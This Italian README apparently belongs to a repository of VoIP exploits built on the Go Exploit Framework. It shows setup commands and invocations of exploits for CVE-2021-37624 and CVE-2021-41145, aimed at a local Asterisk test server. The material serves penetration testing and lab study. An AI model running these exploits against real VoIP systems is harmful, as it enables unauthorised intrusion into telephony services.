
Una raccolta di exploit per diversi prodotti VoIP.
lavori in corso
Una raccolta di exploit per diversi prodotti VoIP. Grazie al Go Exploit Framework.
Se sei finito qui cercando una soluzione di pentesting VoIP, dai un'occhiata a
Sippts (sippts-gui in Kali) oppure a
SIPVicious. Questo progetto è
più focalizzato sulla fase di exploitation.
git clone https://github.com/jesusprubio/bluebox.git
cd bluebox
go mod tidy
go mod vendor
Seguiamo i pattern consigliati dal Go Exploit Framework. Per comodità, i binari non sono inclusi in questo repository.
go run cve-2021-37624/main.go -v -rhost 127.0.0.1
go run cve-2021-37624/main.go -fll DEBUG -v -c -e -rhost 127.0.0.1 -rport 5061 -transport tls -msg ey -user dembele
go run cve-2021-41145/main.go -v -c -e -rhost 127.0.0.1 -fhost rand
Viene fornito un file Docker Compose, che include un server Asterisk su cui testare.
task docker # Or `docker compose up -d`